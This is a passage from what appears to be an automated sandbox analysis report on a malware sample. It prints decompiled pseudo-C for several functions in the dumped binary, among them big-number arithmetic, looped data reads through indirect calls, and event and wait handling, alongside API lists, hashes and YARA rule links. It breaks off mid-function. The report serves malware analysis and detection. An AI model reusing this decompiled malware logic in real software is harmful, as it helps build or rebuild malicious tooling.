                                                          0x0467708c
                                                          0x0467708c
                                                          0x0467708f
                                                          0x04677095
                                                          0x04677098
                                                          0x046770a1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x046770a1
                                                          0x04676ff5
                                                          0x04676fef
                                                          0x04676fd8
                                                          0x046770a7
                                                          0x046770a7
                                                          0x046770ad
                                                          0x046770ad
                                                          0x046770b3
                                                          0x046770b3
                                                          0x046770bc
                                                          0x046770c2
                                                          0x046770c2
                                                          0x04676f7f
                                                          0x046770cb

                                                          APIs
                                                          • SysAllocString.OLEAUT32(0467C290), ref: 04676F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 0467706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04677084
                                                          • SysFreeString.OLEAUT32(?), ref: 046770B3
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: 8890ea68758b7257839c998a6e46ce3aa2db181bedc89768fb44e39a87b7e634
                                                          • Instruction ID: c19537f310ba417333e71f6cb47b476e6e3bde0c831e18428434d02b3a13706e
                                                          • Opcode Fuzzy Hash: 8890ea68758b7257839c998a6e46ce3aa2db181bedc89768fb44e39a87b7e634
                                                          • Instruction Fuzzy Hash: C3510D75D00519EFCB10DFE8C888DAEB7B9EF89705B158598E915EB310E732AD41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046753C6, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E046753C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04671AD1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E046750FF(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04675745(_t101,  &_v236, _a8, _t96 - _t81);
					E04675745(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E046750FF(_t101, 0x467d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E046750FF(_a16, _a4);
						E04675088(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0467AF2E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0467AF28();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04675F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E046790C2(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04676044(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x467d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                          0x046753c9
                                                          0x046753d5
                                                          0x046753db
                                                          0x046753e0
                                                          0x046753e4
                                                          0x04675541
                                                          0x04675545
                                                          0x04675545
                                                          0x046753ea
                                                          0x046753ee
                                                          0x046753f2
                                                          0x046753f5
                                                          0x04675400
                                                          0x04675406
                                                          0x0467540b
                                                          0x0467540e
                                                          0x04675428
                                                          0x04675434
                                                          0x0467543d
                                                          0x04675447
                                                          0x0467544c
                                                          0x0467544e
                                                          0x04675451
                                                          0x046754ff
                                                          0x04675505
                                                          0x04675516
                                                          0x04675529
                                                          0x04675539
                                                          0x00000000
                                                          0x0467553e
                                                          0x0467545a
                                                          0x04675461
                                                          0x04675465
                                                          0x0467546b
                                                          0x0467546d
                                                          0x0467546f
                                                          0x04675471
                                                          0x04675473
                                                          0x0467547d
                                                          0x04675482
                                                          0x04675484
                                                          0x04675486
                                                          0x04675487
                                                          0x04675488
                                                          0x04675489
                                                          0x04675490
                                                          0x04675497
                                                          0x0467549a
                                                          0x0467549a
                                                          0x04675467
                                                          0x04675467
                                                          0x04675467
                                                          0x046754a2
                                                          0x046754aa
                                                          0x046754b3
                                                          0x046754b8
                                                          0x046754b8
                                                          0x046754bd
                                                          0x00000000
                                                          0x00000000
                                                          0x046754bf
                                                          0x046754c2
                                                          0x046754cc
                                                          0x00000000
                                                          0x00000000
                                                          0x046754ce
                                                          0x046754ce
                                                          0x046754d8
                                                          0x046754b8
                                                          0x046754bd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x046754bd
                                                          0x046754e2
                                                          0x046754e5
                                                          0x046754e8
                                                          0x046754ef
                                                          0x046754ef
                                                          0x046754fc
                                                          0x00000000
                                                          0x046754fc
                                                          0x046753f7
                                                          0x046753fb
                                                          0x046753fc
                                                          0x046753fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x046753fe
                                                          0x00000000

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04675473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04675489
                                                          • memset.NTDLL ref: 04675529
                                                          • memset.NTDLL ref: 04675539
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: f7a145b2f1bd4c3d077c31fb7f8a7517229eddf5b9689b8c9ccea3d4083bf820
                                                          • Instruction ID: 11fbe8de8ffa0a22658ac8a7696cd11566b0f9e79f2ae0a92c1f6e9c87396ab7
                                                          • Opcode Fuzzy Hash: f7a145b2f1bd4c3d077c31fb7f8a7517229eddf5b9689b8c9ccea3d4083bf820
                                                          • Instruction Fuzzy Hash: 7D418E71A00219BBEB10DFA8CC80BDE7765EF44314F1085A9B91AA7684FB70B9598B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0467A81C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 0467A82E
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • ResetEvent.KERNEL32(?), ref: 0467A8A2
                                                          • GetLastError.KERNEL32 ref: 0467A8C5
                                                          • GetLastError.KERNEL32 ref: 0467A970
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: d9e91709bfeaf8362f86ade082e21b95cf24ed5205e7f323266ef240f8d0540b
                                                          • Instruction ID: 6eb224cc7867e1c68047896bc37811184332a7496e46ecce76025c313e6b5a7f
                                                          • Opcode Fuzzy Hash: d9e91709bfeaf8362f86ade082e21b95cf24ed5205e7f323266ef240f8d0540b
                                                          • Instruction Fuzzy Hash: 8C417B71600204BFDB219FE1DC88EAF7BBDEF99744B104929F642E2291F735A955CA20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046715FF, Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 42%
                                                          			E046715FF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x467d134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x467d164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E0467A71F(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x467d134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E04675646( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E0467A734(_v16);
										if(_t64 == 0) {
											_t64 = E046770CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E04675646( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E04679242(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}
















                                                          0x046715ff
                                                          0x04671600
                                                          0x04671606
                                                          0x04671611
                                                          0x04671611
                                                          0x04671613
                                                          0x046718e7
                                                          0x046718ec
                                                          0x046718ee
                                                          0x046718f3
                                                          0x046718f4
                                                          0x046718f9
                                                          0x046718fa
                                                          0x04671905
                                                          0x04671936
                                                          0x0467193b
                                                          0x046719fe
                                                          0x04671941
                                                          0x04671948
                                                          0x04671950
                                                          0x046719fb
                                                          0x04671956
                                                          0x0467195b
                                                          0x04671960
                                                          0x04671965
                                                          0x046719ed
                                                          0x0467196b
                                                          0x0467196b
                                                          0x0467196d
                                                          0x04671973
                                                          0x04671974
                                                          0x04671974
                                                          0x04671977
                                                          0x0467197a
                                                          0x04671980
                                                          0x04671985
                                                          0x04671986
                                                          0x0467198b
                                                          0x0467198e
                                                          0x04671999
                                                          0x00000000
                                                          0x00000000
                                                          0x046719a1
                                                          0x046719a9
                                                          0x046719b5
                                                          0x046719b9
                                                          0x046719bb
                                                          0x046719c0
                                                          0x00000000
                                                          0x00000000
                                                          0x046719c0
                                                          0x046719b9
                                                          0x046719d2
                                                          0x046719d5
                                                          0x046719dc
                                                          0x046719e7
                                                          0x046719e7
                                                          0x00000000
                                                          0x046719c2
                                                          0x046719c2
                                                          0x046719c7
                                                          0x046719c9
                                                          0x046719ca
                                                          0x046719cd
                                                          0x00000000
                                                          0x046719cd
                                                          0x00000000
                                                          0x046719c7
                                                          0x04671974
                                                          0x046719ee
                                                          0x046719ee
                                                          0x046719f4
                                                          0x046719f4
                                                          0x04671950
                                                          0x04671907
                                                          0x0467190d
                                                          0x04671915
                                                          0x0467192e
                                                          0x04671930
                                                          0x00000000
                                                          0x00000000
                                                          0x04671917
                                                          0x04671921
                                                          0x04671925
                                                          0x0467192b
                                                          0x00000000
                                                          0x0467192b
                                                          0x04671925
                                                          0x04671915
                                                          0x04671a07
                                                          0x04671608
                                                          0x04671608
                                                          0x0467160f
                                                          0x0467161a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0467160f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 046718EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 04671907
                                                          • ResetEvent.KERNEL32(?), ref: 04671980
                                                          • GetLastError.KERNEL32 ref: 0467199B
                                                            • Part of subcall function 04679242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04679259
                                                            • Part of subcall function 04679242: SetEvent.KERNEL32(?), ref: 04679269
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 116fab3cca07f5e6533ade87cae026cbfbbdf583b15a8f992efdafd0f1d1d18a
                                                          • Instruction ID: 728181375953adb32a2c9b89e540b39aa616154470d5cb3f700b249e315a8290
                                                          • Opcode Fuzzy Hash: 116fab3cca07f5e6533ade87cae026cbfbbdf583b15a8f992efdafd0f1d1d18a
                                                          • Instruction Fuzzy Hash: 7741B232700604ABDB219FA5DC44AEEB7B9EF85365F10066AE552D7390FA30FD429B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04673AB0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 04673B0D
                                                          • SysAllocString.OLEAUT32(046785ED), ref: 04673B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04673B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04673B73
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: ac7ab6dfe1a30ac736e8f77d8a486e9576111c94421a9d3a91c97a7b222fc62b
                                                          • Instruction ID: d76efe26a1b6ae535381e52f584fd0b99c690f8ad147b39198999610513675f9
                                                          • Opcode Fuzzy Hash: ac7ab6dfe1a30ac736e8f77d8a486e9576111c94421a9d3a91c97a7b222fc62b
                                                          • Instruction Fuzzy Hash: 1F310E71900209EFCB04DFA8D8C08AE7BB9FF58750B10842EF90697350E735AA85DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046711EE, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E046711EE(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x467d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x467d2a8; // 0x47a5a8
				_t3 = _t8 + 0x467e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E046738A8(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x467d2ac, 1, 0, _t30);
					E0467A734(_t30);
				}
				_t12 =  *0x467d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E0467A65C() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04678EA1(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x467d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E0467A273(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                          0x046711ef
                                                          0x046711f6
                                                          0x04671200
                                                          0x04671204
                                                          0x0467120a
                                                          0x04671219
                                                          0x04671220
                                                          0x04671224
                                                          0x04671236
                                                          0x04671238
                                                          0x04671238
                                                          0x0467123d
                                                          0x04671244
                                                          0x0467129b
                                                          0x0467129b
                                                          0x046712a1
                                                          0x046712a3
                                                          0x046712a3
                                                          0x046712ad
                                                          0x046712b1
                                                          0x046712c3
                                                          0x046712c3
                                                          0x046712c7
                                                          0x046712cd
                                                          0x046712cd
                                                          0x00000000
                                                          0x0467125d
                                                          0x04671262
                                                          0x0467126a
                                                          0x0467126e
                                                          0x04671272
                                                          0x04671272
                                                          0x0467127f
                                                          0x04671283
                                                          0x04671287
                                                          0x046712dc
                                                          0x046712e2
                                                          0x046712e2
                                                          0x04671295
                                                          0x04671299
                                                          0x046712d0
                                                          0x046712d2
                                                          0x046712d5
                                                          0x046712d5
                                                          0x00000000
                                                          0x046712d2
                                                          0x04671299
                                                          0x00000000
                                                          0x04671283

                                                          APIs
                                                            • Part of subcall function 046738A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,04AF9A98,00000000,?,?,63699BC3,00000005,0467D00C,?,?,04675D30), ref: 046738DE
                                                            • Part of subcall function 046738A8: lstrcpy.KERNEL32(00000000,00000000), ref: 04673902
                                                            • Part of subcall function 046738A8: lstrcat.KERNEL32(00000000,00000000), ref: 0467390A
                                                          • CreateEventA.KERNEL32(0467D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04673760,?,00000001,?), ref: 0467122F
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04673760,00000000,00000000,?,00000000,?,04673760,?,00000001,?,?,?,?,046752AA), ref: 0467128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04673760,?,00000001,?), ref: 046712BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04673760,?,00000001,?,?,?,?,046752AA), ref: 046712D5
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: 8a4f66580711c50c26788ee42e8d3c5748745169fa43103a4413eb72cf69f383
                                                          • Instruction ID: a4bb887fec44bce4dc93fadf54279e051d4f55a502b90313352d8d1fe7e69c43
                                                          • Opcode Fuzzy Hash: 8a4f66580711c50c26788ee42e8d3c5748745169fa43103a4413eb72cf69f383
                                                          • Instruction Fuzzy Hash: BF21E4326003106BD7215EA88C44AEB73A9FFAB710B15061AFF65E7340FB65ED818694
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04679242, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E04679242(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x467d13c; // 0x467abf1
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E0467A71F(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E0467A734(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04675646( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                          0x04679242
                                                          0x04679242
                                                          0x0467924c
                                                          0x04679252
                                                          0x04679255
                                                          0x04679259
                                                          0x0467925f
                                                          0x04679264
                                                          0x0467927d
                                                          0x04679280
                                                          0x04679284
                                                          0x04679288
                                                          0x04679289
                                                          0x0467928e
                                                          0x04679291
                                                          0x04679298
                                                          0x0467929f
                                                          0x046792f2
                                                          0x046792f8
                                                          0x046792fe
                                                          0x04679339
                                                          0x0467933f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x046792fe
                                                          0x046792a5
                                                          0x00000000
                                                          0x046792ac
                                                          0x046792ba
                                                          0x046792bd
                                                          0x046792c0
                                                          0x046792cc
                                                          0x046792d0
                                                          0x04679332
                                                          0x046792d2
                                                          0x046792d5
                                                          0x046792d9
                                                          0x046792da
                                                          0x046792db
                                                          0x046792dd
                                                          0x046792e4
                                                          0x04679322
                                                          0x0467932d
                                                          0x046792e6
                                                          0x046792e9
                                                          0x046792ed
                                                          0x046792ed
                                                          0x046792e4
                                                          0x00000000
                                                          0x046792d0
                                                          0x046792a5
                                                          0x04679269
                                                          0x0467926f
                                                          0x04679272
                                                          0x04679277
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04679307
                                                          0x0467930f
                                                          0x04679314
                                                          0x04679317
                                                          0x00000000

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04679259
                                                          • SetEvent.KERNEL32(?), ref: 04679269
                                                          • GetLastError.KERNEL32 ref: 046792F2
                                                            • Part of subcall function 04675646: WaitForMultipleObjects.KERNEL32(00000002,0467A8E3,00000000,0467A8E3,?,?,?,0467A8E3,0000EA60), ref: 04675661
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          • GetLastError.KERNEL32(00000000), ref: 04679327
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: 707f55a90e6e121e7475679d7074c8742d9810986055e7febdf723ce17c8b87a
                                                          • Instruction ID: 11d62f7217f2487d322f07f6cbb2179643495315f86f39e4d43d1835bfa37785
                                                          • Opcode Fuzzy Hash: 707f55a90e6e121e7475679d7074c8742d9810986055e7febdf723ce17c8b87a
                                                          • Instruction Fuzzy Hash: D73103B5900309EFEB20DFF5D8C499EB7F8FB14314F10496AD542E2250E735AA499F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046736B1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E046736B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04673BB9(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E04674F79(_t23);
						}
					}
					return _t38;
				}
				if(E0467A2F9(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x467d2ac, 1, 0,  *0x467d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E0467A446(_t36);
